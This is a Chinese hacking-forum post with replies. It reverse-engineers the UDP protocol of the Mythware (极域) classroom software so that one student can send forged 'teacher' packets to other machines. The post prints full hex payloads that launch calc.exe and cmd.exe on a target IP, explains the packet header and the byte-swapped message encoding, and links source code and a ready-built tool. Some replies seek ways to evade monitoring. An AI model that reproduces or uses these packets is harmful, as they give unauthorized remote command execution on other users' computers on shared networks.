吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 28487|回复: 141
收起左侧

[原创] 极域电子教室的反控制实现【无需教师端】

    [复制链接]
jidesheng6 发表于 2020-1-17 19:05
本帖最后由 jidesheng6 于 2020-10-24 16:21 编辑

大概是去年,有看到CSDN上面几位大佬提到过,抓数据包来用极域去反控制其他机房的学生电脑,但是写的其实还是不是太详细,有代码,我当时也没看懂,最近无聊就重新实操了一下,在这过程还发现了不少坑。


首先老样子介绍一下软件:软件是极域电子教室V6.0 2016豪华版,具体版本号我没去看,现在学校机房大多数用的都是这个版本。


首先打开Wireshark来抓包看看:
抓包1.png

不难发现,教师端的机器一直在朝224.50.50.42这个地址发送数据包,其中含义我们也不清楚,后来在网上找到了一篇网站是介绍这个极域电子教室工作流程的





1.png



接着我们来给学生机器执行一条远程命令试试,然后停止抓包


界面1.png



因为我们是针对一个机器来执行命令的,所以找到目标机器的IP地址:192.168.3.2,可以在Wireshark下面看到请求的执行文件名,前面还有一堆含义未知的数据,另外:数据包的长度建议只多不少,不然消息无法发送出去



抓包2.png
抓包3.png
我们去把十六进制数据复制下来,得到这些数据:
[Asm] 纯文本查看 复制代码
444d4f43000001006e03000053ca6c1aee108e419f4972f36d109c69204e0000c0a803fe610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c00430041004c0043002e0045005800450000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000


数据包很长,但是无用的数据也很多,上面是打开计算器的数据包,接下来再抓一下打开CMD的数据包:
[Asm] 纯文本查看 复制代码
444d4f43000001006e030000a53fbfe91d62404cb156c44f90b18441204e0000c0a803fe610300006103000000020000000000000f0000000100000043003a005c00570069006e0064006f00770073005c00730079007300740065006d00330032005c0063006d0064002e00650078006500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000


两段数据包有点相似,经过多次抓包实验发现,得出一个结论,前面的:
[Asm] 纯文本查看 复制代码
444d4f43000001009e030000dc79fabb169ec04ca009db380f7f34ee204e0000c0a803fe9103000091030000000800000000000005000000

这一段很有可能就是固定不变的值,起码DMOC这段十六进制是不变的,后期发现,相同数据包在一分钟之内只能发送一次,后面我没有去改代码,应该是dmoc后面随机几个字符,就可以实现了,有大佬有能力可以试试,这些都是猜测,如果说的不对也不要怪我哈

到这里还没有完,因为还有一个发送消息的数据包,我们发一条消息给目标计算机:
发送1.png

发送过去之后,我们来查看数据包:
抓包4.png

可以看到,前面一堆数据之后,出现了我们发送的信息(604F7D59),这边就踩了不少坑,之前以为是十六进制,想着转成十六进制带进去就行了,结果发出来是乱码的,于是把汉字用各种编码试了一便,最后发现,
是Unicode编码打乱顺序以后再发送的,解码是学生端那边的事情:
unicode转换.png
可以看到“你好”这两个汉字转出来的Unicode编码是:\u4f60\u597d
处理一下就是:4f60597d,仔细观察,是把这一段分成了两部分,四个为一组,把最后两个和第一二个位置调换,如果我们直接按照转换的4f60597d发送,客户端接收到的就是乱码,我们把乱码拿到Unicode这里重新转换一次,就是我们Wireshark里面的排序方式,说的有点乱,具体是什么样子我也记不清了,可以自己试试


既然知道了排序方法,就来处理一下,但是我只处理了中文,对英文数字没做处理,有兴趣的可以自己处理一下:


Python下的处理方式:
Python处理Unicode.png


易语言里面的处理:

E语言处理unicode.png

最后我们把这些得到的数据组合起来,用UDP方法发送出去就可以了(所有的命令一分钟内貌似只能执行一次,需要多次执行可能要随机UDP包数据的开头部分,这个我没做,大佬可以试试看)


效果如下:
demo.gif


悄咪咪说一句:然而不能在学校里面测试了,因为已经不用回学校了虽然写着无需教师端,但是教师端是要在线且要发送消息的IP连上教师机才可以


E语言源码,看到有老哥要的,这个应该不算病毒吧 MythwareReverse.zip (933.6 KB, 下载次数: 1210)

更新一个编译好的,还是初始版本,有的老哥要直接用的,下载这个吧: 极域1.0.zip (1.1 MB, 下载次数: 1821)

免费评分

参与人数 23威望 +1 吾爱币 +31 热心值 +21 收起 理由
kei100 + 1 + 1 我很赞同!
战言灬永不败 + 2 + 1 我很赞同!
余吉 + 1 + 1 非常爱你 在GitHub上看到的 居然52也有你 谢谢你的源码 学习了!!!希望功.
黄黄昊昊 + 1 谢谢@Thanks!
流星☆漫空 + 1 + 1 我很赞同!
Noobb + 1 谢谢@Thanks!
回荡 + 1 我很赞同!
Hmily + 1 + 7 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
nj001 + 1 + 1 我很赞同!
sirzdc + 1 + 1 用心讨论,共获提升!
Aix + 1 貌似e源码不完整,缺少dll文件
深渊莫冥 + 1 + 1 谢谢@Thanks!
zxczxc1 + 1 我很赞同!
恶搞大王 + 1 + 1 以后有空玩玩
lookerJ + 1 + 1 谢谢@Thanks!
whc2001 + 2 + 1 会玩
hwq + 1 + 1 666啊!
SYWZWL + 1 + 1 我很赞同!
zedong + 2 + 1 鼓励转贴优秀软件安全工具和文档!
howsk + 2 + 1 用心讨论,共获提升!
huzpsb + 3 + 1 我很赞同!同时坐等易语言源码放出(懒得ocr)
outlooking + 1 + 1 我很赞同!
生有涯知无涯 + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Oercy 发表于 2020-2-19 19:03
小学的时候为了不被控制把被控端目录下没有被占用的文件都删除(学校电脑都有带还原卡所以不怕出事)然后由于缺少核心文件 老师控制电脑时我那台电脑就不会被控制 于是乎就可以插上U盘玩提前下好的小游戏...
 楼主| jidesheng6 发表于 2021-3-31 12:31
klxn0-0 发表于 2021-3-27 23:08
udp组网实现,和极域本体冲突,只能用ip发送了

不知道你想实现的是哪种样子,局域网扫描的话是想像nmap那样扫描出ip地址么,nmap的方式也有很多种,最简单的一种就是用ping命令测试通路,成功返回地址,失败丢弃,其他的还有用tcp这种模式扫描,可能会复杂点。
2Burhero 发表于 2020-1-17 19:18
zwmfyy 发表于 2020-1-17 19:30
感谢分享,虽然看不懂。
cocoan 发表于 2020-1-17 19:34
能不能研究一下怎么去除教师端在监控或控制学生端之前,学生端会收到正在被监控或控制的弹窗提示
 楼主| jidesheng6 发表于 2020-1-17 19:43
cocoan 发表于 2020-1-17 19:34
能不能研究一下怎么去除教师端在监控或控制学生端之前,学生端会收到正在被监控或控制的弹窗提示

你好,不能。
无名氏wyw 发表于 2020-1-17 19:56
是否可以通过拦截包做到屏蔽老师发送的全屏投影和远程关机命令?
 楼主| jidesheng6 发表于 2020-1-17 19:58
无名氏wyw 发表于 2020-1-17 19:56
是否可以通过拦截包做到屏蔽老师发送的全屏投影和远程关机命令?

防火墙...
无名氏wyw 发表于 2020-1-17 20:05

问题是,如果拦截了所有包,极域自己会不会有所反应?而且老师应该也会发现
dunniu 发表于 2020-1-17 20:05
能实现其它命令不?如文件传输,远程控制等,那就可以直接用自写程序代替这个软件了,因为学生端是不用注册的!!!
NB2007 发表于 2020-1-17 20:08
放了寒假才看到,晚了
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2022-12-9 23:27

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表